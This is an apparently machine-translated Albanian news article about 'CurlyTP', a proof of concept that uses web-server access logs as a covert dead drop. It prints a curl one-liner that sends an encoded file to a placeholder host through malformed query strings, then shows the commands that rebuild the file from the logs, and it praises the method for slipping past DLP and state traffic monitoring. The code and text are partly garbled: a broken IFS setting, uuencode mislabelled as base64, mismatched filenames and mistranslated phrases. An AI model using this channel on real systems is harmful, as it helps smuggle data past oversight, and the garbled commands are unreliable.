Sipas përkufizimit të Wikipedia, një pikë e vdekur është një mjet konspirativ që shërben për të shkëmbyer informacione ose disa sende midis njerëzve që përdorin një vendndodhje sekrete. Ideja është që njerëzit nuk takohen kurrë - por ata ende shkëmbejnë informacione për të ruajtur sigurinë operacionale.

Vendi i fshehjes nuk duhet të tërheqë vëmendjen. Prandaj, në botën offline ata shpesh përdorin gjëra diskrete: një tullë të lirshme në mur, një libër bibliotekë ose një zgavër në një pemë.

Në internet ka shumë mjete kriptimi dhe anonimizimi, por vetë fakti i përdorimit të këtyre mjeteve tërheq vëmendjen. Përveç kësaj, ato mund të bllokohen në nivel të korporatës ose qeverisë. Çfarë duhet bërë?

Zhvilluesi Ryan Flowers propozoi një opsion interesant - përdorni çdo web server si një vend fshehjeje. Nëse mendoni për këtë, çfarë bën një server në internet? Merr kërkesa, lëshon skedarë dhe shkruan regjistrat. Dhe regjistron të gjitha kërkesat, edhe ato të pasakta!

Rezulton se çdo server në internet ju lejon të ruani pothuajse çdo mesazh në regjistër. Lulet pyesnin veten se si ta përdornin këtë.

Ai ofron këtë opsion:

1. Merrni një skedar teksti (mesazh sekret) dhe llogarisni hash-in (md5sum).
2. E kodojmë (gzip+uuecode).
3. Ne shkruajmë në regjistër duke përdorur një kërkesë qëllimisht të pasaktë për serverin.

Local:
[root@local ~]# md5sum g.txt
a8be1b6b67615307e6af8529c2f356c4 g.txt

[root@local ~]# gzip g.txt
[root@local ~]# uuencode g.txt > g.txt.uue
[root@local ~]# IFS=$'n' ;for x in `cat g.txt.uue| sed 's/ /=+=/g'` ; do echo curl -s "http://domain.com?transfer?g.txt.uue?$x" ;done | sh

Për të lexuar një skedar, duhet t'i kryeni këto operacione në rend të kundërt: deshifroni dhe çzipni skedarin, kontrolloni hash-in (hash-i mund të transmetohet në mënyrë të sigurt përmes kanaleve të hapura).

Hapësirat zëvendësohen me =+=në mënyrë që të mos ketë hapësira në adresë. Programi, të cilin autori e quan CurlyTP, përdor kodimin bazë64, si bashkëngjitjet e postës elektronike. Kërkesa bëhet me një fjalë kyçe ?transfer?në mënyrë që marrësi ta gjejë lehtësisht në regjistrat.

Çfarë shohim në regjistrat në këtë rast?

1.2.3.4 - - [22/Aug/2019:21:12:00 -0400] "GET /?transfer?g.gz.uue?begin-base64=+=644=+=g.gz.uue HTTP/1.1" 200 4050 "-" "curl/7.29.0"
1.2.3.4 - - [22/Aug/2019:21:12:01 -0400] "GET /?transfer?g.gz.uue?H4sICLxRC1sAA2dpYnNvbi50eHQA7Z1dU9s4FIbv8yt0w+wNpISEdstdgOne HTTP/1.1" 200 4050 "-" "curl/7.29.0"
1.2.3.4 - - [22/Aug/2019:21:12:03 -0400] "GET /?transfer?g.gz.uue?sDvdDW0vmWNZiQWy5JXkZMyv32MnAVNgQZCOnfhkhhkY61vv8+rDijgFfpNn HTTP/1.1" 200 4050 "-" "curl/7.29.0"

Siç është përmendur tashmë, për të marrë një mesazh sekret, duhet të kryeni operacionet në rend të kundërt:

Remote machine

[root@server /home/domain/logs]# grep transfer access_log | grep 21:12| awk '{ print $7 }' | cut -d? -f4 | sed 's/=+=/ /g' > g.txt.gz.uue
[root@server /home/domain/logs]# uudecode g.txt.gz.uue

[root@server /home/domain/logs]# mv g.txt.gz.uue g.txt.gz
[root@server /home/domain/logs]# gunzip g.txt.gz
[root@server /home/domain/logs]# md5sum g
a8be1b6b67615307e6af8529c2f356c4 g

Procesi është i lehtë për t'u automatizuar. Md5sum përputhet, dhe përmbajtja e skedarit konfirmon që gjithçka është deshifruar saktë.

Metoda është shumë e thjeshtë. “Qëllimi i këtij ushtrimi është vetëm të provojë se skedarët mund të transferohen përmes kërkesave të vogla të pafajshme në internet dhe funksionon në çdo server në internet me regjistrat e tekstit të thjeshtë. Në thelb, çdo web server është një vend fshehje!”, shkruan Flowers.

Sigurisht, metoda funksionon vetëm nëse marrësi ka qasje në regjistrat e serverit. Por një akses i tillë ofrohet, për shembull, nga shumë hoste.

Si ta përdorim atë?

Ryan Flowers thotë se ai nuk është një ekspert i sigurisë së informacionit dhe nuk do të përpilojë një listë të përdorimeve të mundshme për CurlyTP. Për të, është vetëm një provë e konceptit që mjetet e njohura që shohim çdo ditë mund të përdoren në një mënyrë jokonvencionale.

Në fakt, kjo metodë ka një numër avantazhesh ndaj "fshehjeve" të tjera të serverëve si Drop Digital Dead ose PirateBox: nuk kërkon konfigurim të veçantë në anën e serverit ose ndonjë protokoll të veçantë - dhe nuk do të ngjall dyshime tek ata që monitorojnë trafikun. Nuk ka gjasa që një sistem SORM ose DLP të skanojë URL-të për skedarë teksti të kompresuar.

Kjo është një nga mënyrat për të transmetuar mesazhe përmes skedarëve të shërbimit. Ju mund të mbani mend se si vendosnin disa kompani të avancuara Punë zhvilluesish në titujt HTTP ose në kodin e faqeve HTML.

Ideja ishte që vetëm zhvilluesit e uebit do ta shihnin këtë vezë të Pashkëve, pasi një person normal nuk do të shikonte titujt ose kodin HTML.

Burimi: www.habr.com